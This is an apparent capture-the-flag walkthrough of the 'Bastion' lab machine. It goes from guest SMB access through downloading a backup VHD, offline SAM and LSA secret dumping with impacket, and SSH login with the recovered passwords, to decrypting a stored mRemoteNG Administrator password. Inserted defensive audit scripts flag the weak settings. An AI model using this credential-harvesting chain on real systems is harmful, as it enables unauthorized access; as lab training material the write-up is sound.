Bastion

Tools

  • crackmapexec
  • smbclient
  • qemu-nbd
  • impacket-secretsdump

Getting User

Nmap

$ sudo nmap -sS 10.129.136.29                                             
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-07 02:48 EST
Nmap scan report for 10.129.136.29
Host is up (0.31s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 9.00 seconds
$ sudo nmap -sC -sV -p22,135,139,445 10.129.136.29                         
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-07 02:53 EST
Nmap scan report for 10.129.136.29
Host is up (0.18s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -19m58s, deviation: 34m36s, median: 0s
| smb2-time:
| date: 2026-02-07T07:54:06
|_ start_date: 2026-02-07T07:42:50
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-02-07T08:54:05+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds

Foothold

Port 445 is open, so I can start with crackmapexec, authenticating as Guest with an empty password, to enumerate any accessible shares:

$ crackmapexec smb 10.129.136.29 --shares -u 'Guest' -p ''
SMB 10.129.136.29 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.129.136.29 445 BASTION [+] Bastion\Guest:
SMB 10.129.136.29 445 BASTION [+] Enumerated shares
SMB 10.129.136.29 445 BASTION Share Permissions Remark
SMB 10.129.136.29 445 BASTION ----- ----------- ------
SMB 10.129.136.29 445 BASTION ADMIN$ Remote Admin
SMB 10.129.136.29 445 BASTION Backups READ
SMB 10.129.136.29 445 BASTION C$ Default share
SMB 10.129.136.29 445 BASTION IPC$ Remote IPC

There is a share called Backups that the Guest account can read.
Let's connect to the share anonymously and recursively download its contents:

$ smbclient -N //10.129.136.29/Backups
Try "help" to get a list of possible commands.
smb: \> RECRUSE ON
RECRUSE: command not found
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \note.txt of size 116 as note.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd of size 37761024 as WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd (4318.0 KiloBytes/sec) (average 3746.1 KiloBytes/sec)

note.txt reads as follows:

$ cat note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

There are two VHD files in the backup. The download of the second one did not complete because of its size, so let's download it again, this time with a longer per-operation I/O timeout.
The file is called 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd.

$ smbclient -N //10.129.136.29/Backups                                      
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Feb 7 03:20:06 2026
.. D 0 Sat Feb 7 03:20:06 2026
BoYDQLtEFx D 0 Sat Feb 7 03:12:29 2026
JDBGIMYOGA.txt A 0 Sat Feb 7 03:20:06 2026
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
SWMJUATQPY.txt A 0 Sat Feb 7 03:12:43 2026
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019

5638911 blocks of size 4096. 1177226 blocks available
smb: \> timeout 300000
io_timeout per operation is now 300000
smb: \> RECURSE ON
smb: \> prompt OFF
smb: \> RECURSE OFF
smb: \> cd WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> mget 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

In a second terminal, I use watch to follow the progress of the download and make sure it is not stuck:
if the file size increases on every refresh, the transfer is still running.

$ watch -n 1 ls -lh 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

Every 1.0s: ls -lh 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd kali: Sat Feb 7 03:50:17 2026

-rw-r--r-- 1 kali kali 1.6G Feb 7 03:50 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

The file has finished downloading, with a total size of 5.1G:

-rw-r--r-- 1 kali kali 5.1G Feb  7 03:58 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

Let's mount the VHD with qemu-nbd.
First, load the NBD kernel module:

$ sudo modprobe nbd max_part=8

Then attach the VHD to a network block device:

$ sudo qemu-nbd --connect=/dev/nbd1 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

Let's find the partition; it's nbd1p1:

$ lsblk                               

NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
sda 8:0 0 40G 0 disk
├─sda1 8:1 0 39G 0 part /
├─sda2 8:2 0 1K 0 part
└─sda5 8:5 0 975M 0 part [SWAP]
sr0 11:0 1 1024M 0 rom
nbd0 43:0 0 0B 0 disk
nbd1 43:16 0 14.9G 0 disk
└─nbd1p1 43:17 0 14.9G 0 part
nbd2 43:32 0 0B 0 disk
nbd3 43:48 0 0B 0 disk
nbd4 43:64 0 0B 0 disk
nbd5 43:80 0 0B 0 disk
nbd6 43:96 0 0B 0 disk
nbd7 43:112 0 0B 0 disk
nbd8 43:128 0 0B 0 disk
nbd9 43:144 0 0B 0 disk
nbd10 43:160 0 0B 0 disk
nbd11 43:176 0 0B 0 disk
nbd12 43:192 0 0B 0 disk
nbd13 43:208 0 0B 0 disk
nbd14 43:224 0 0B 0 disk
nbd15 43:240 0 0B 0 disk

Now we can mount it:

sudo mkdir -p /mnt/vhd
sudo mount /dev/nbd1p1 /mnt/vhd

We can now enumerate the files and look for anything that yields user credentials:

ls /mnt/vhd
'$Recycle.Bin' 'Program Files' 'System Volume Information' autoexec.bat
'Documents and Settings' ProgramData Users config.sys
PerfLogs

The SAM, SYSTEM and SECURITY registry hives are located in Windows/System32/config.
Let's copy them to our working directory:

$ cp SAM SECURITY SYSTEM ~/htb/bastion

Now we can use impacket-secretsdump to dump the hashes offline from the copied hives:

$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...

Apart from the hashes, the dump also reveals a cleartext password stored in the DefaultPassword LSA secret (the Winlogon automatic-logon password), which belongs to L4mpje, so we now have a username and password:

[*] DefaultPassword
(Unknown User): bureaulampje
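A check a defender can run over such a dump, added here as an example (it is not part of the original writeup or of impacket): it parses the secretsdump listing and flags accounts with a blank password, stored LM hashes, and cleartext LSA secrets. The sample text is constructed from the listing above.

```python
import re

# Constructed sample mirroring the impacket-secretsdump listing above
# (hash values copied from it; the line format is the tool's own).
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] Cleaning up...
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
HASH_LINE = re.compile(r"^([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")

def parse_dump(text):
    """SAM rows plus the LSA secrets listed under a '[*] <name>' header."""
    accounts, secrets, current = [], {}, None
    for line in text.splitlines():
        m = HASH_LINE.match(line)
        if m:
            user, rid, lm, nt = m.groups()
            accounts.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
        elif line.startswith("[*] "):
            # only single-word headers name a secret; progress lines do not
            name = line[4:]
            current = name if " " not in name else None
        elif current and line:
            secrets.setdefault(current, []).append(line)
    return accounts, secrets

def findings(text):
    """What a defender should act on in a backup that exposes these hives."""
    accounts, secrets = parse_dump(text)
    out = []
    for a in accounts:
        if a["nt"] == EMPTY_NT:  # empty-string NT hash: blank password
            out.append(f"{a['user']} (RID {a['rid']}): blank password")
        elif a["lm"] != EMPTY_LM:  # a real LM hash is trivially crackable
            out.append(f"{a['user']}: LM hash present")
    for entry in secrets.get("DefaultPassword", []):
        out.append(f"cleartext autologon password in LSA secrets: {entry}")
    return out
```

Note that in this dump both Administrator and Guest carry the empty-string NT hash, which the writeup does not comment on.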

We can now SSH in with these credentials and read the user flag (the Windows shell uses type rather than cat):

$ ssh L4mpje@10.129.136.29

l4mpje@BASTION C:\Users\L4mpje>cd Desktop

l4mpje@BASTION C:\Users\L4mpje\Desktop>cat user.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt

Getting Root

Information Gathering

Looking at the installed applications, I found mRemoteNG, which stores encrypted passwords in its configuration files:

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

22-02-2019 14:01 <DIR> mRemoteNG

The stored credentials are in confCons.xml under the user's roaming AppData directory:

l4mpje@BASTION C:\Users\L4mpje>dir "%APPDATA%\mRemoteNG"         
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692

Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019 14:03 6.316 confCons.xml

Let's copy the file to our system to inspect it:

$ scp L4mpje@10.129.136.29:"C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml" .

L4mpje@10.129.136.29's password:
confCons.xml

The relevant attributes of the config file are:

$ cat confCons.xml                                                           
EncryptionEngine="AES"
BlockCipherMode="GCM"
KdfIterations="1000"
FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA"
Username="Administrator" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1"

Privilege Escalation

We can now try to decrypt the Administrator's password using an online mRemoteNG Password Decoder.

The decrypted password is thXLHM96BeKL0ER2.
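The attributes shown above describe how mRemoteNG stores these secrets, and an online decoder was enough to recover the password. As an added example (not from the writeup or from mRemoteNG itself), this audit checks a confCons.xml for the settings that make such recovery trivial, without decrypting anything. It assumes mRemoteNG's AES-GCM blob layout (16-byte salt, 16-byte nonce, ciphertext, 16-byte tag) and its fixed 'ThisIsNotProtected' marker in the Protected attribute; the sample file is constructed around the page's two blobs, and the Node name and namespace URI are placeholders.

```python
import base64
import xml.etree.ElementTree as ET

# Constructed minimal confCons.xml carrying the attributes shown above;
# the Node name and namespace URI are assumptions, the blobs are the page's.
SAMPLE_CONFCONS = """\
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" EncryptionEngine="AES"
  BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false"
  Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA">
  <Node Name="local" Username="Administrator" Hostname="127.0.0.1"
    Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="/>
</mrng:Connections>
"""

SALT_LEN, NONCE_LEN, TAG_LEN = 16, 16, 16  # mRemoteNG AES-GCM blob layout
MIN_KDF_ITERATIONS = 100000                # audit threshold chosen here

def split_blob(b64):
    """salt | nonce | ciphertext | tag, as mRemoteNG's AES-GCM engine writes it."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("blob too short for salt, nonce and tag")
    head = SALT_LEN + NONCE_LEN
    return raw[:SALT_LEN], raw[SALT_LEN:head], raw[head:-TAG_LEN], raw[-TAG_LEN:]

def audit(xml_text):
    """Flag weak settings and report each stored credential's length."""
    root = ET.fromstring(xml_text)
    issues = []
    if root.get("FullFileEncryption", "false").lower() != "true":
        issues.append("FullFileEncryption=false: hosts and usernames are cleartext")
    iters = int(root.get("KdfIterations", "0"))
    if iters < MIN_KDF_ITERATIONS:
        issues.append(f"KdfIterations={iters}: low PBKDF2 cost")
    # Protected encrypts a fixed marker; 'ThisIsNotProtected' (18 bytes) means
    # the file relies on the built-in default master password.
    _, _, marker_ct, _ = split_blob(root.get("Protected"))
    if len(marker_ct) == len(b"ThisIsNotProtected"):
        issues.append("Protected marker: default master password in use")
    creds = []
    for node in root.iter("Node"):
        if node.get("Password"):
            _, _, ct, _ = split_blob(node.get("Password"))
            # GCM is a stream mode, so ciphertext length == password length
            creds.append((node.get("Username"), node.get("Hostname"), len(ct)))
    return issues, creds
```

The 16-byte ciphertext matches the 16-character password recovered above, and the three findings together explain why it was recoverable: a default master key, a low KDF cost, and metadata left in the clear.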

We can now log in as Administrator over SSH and get the root flag:

$ ssh administrator@10.129.136.29
administrator@10.129.136.29's password:

administrator@BASTION C:\Users\Administrator>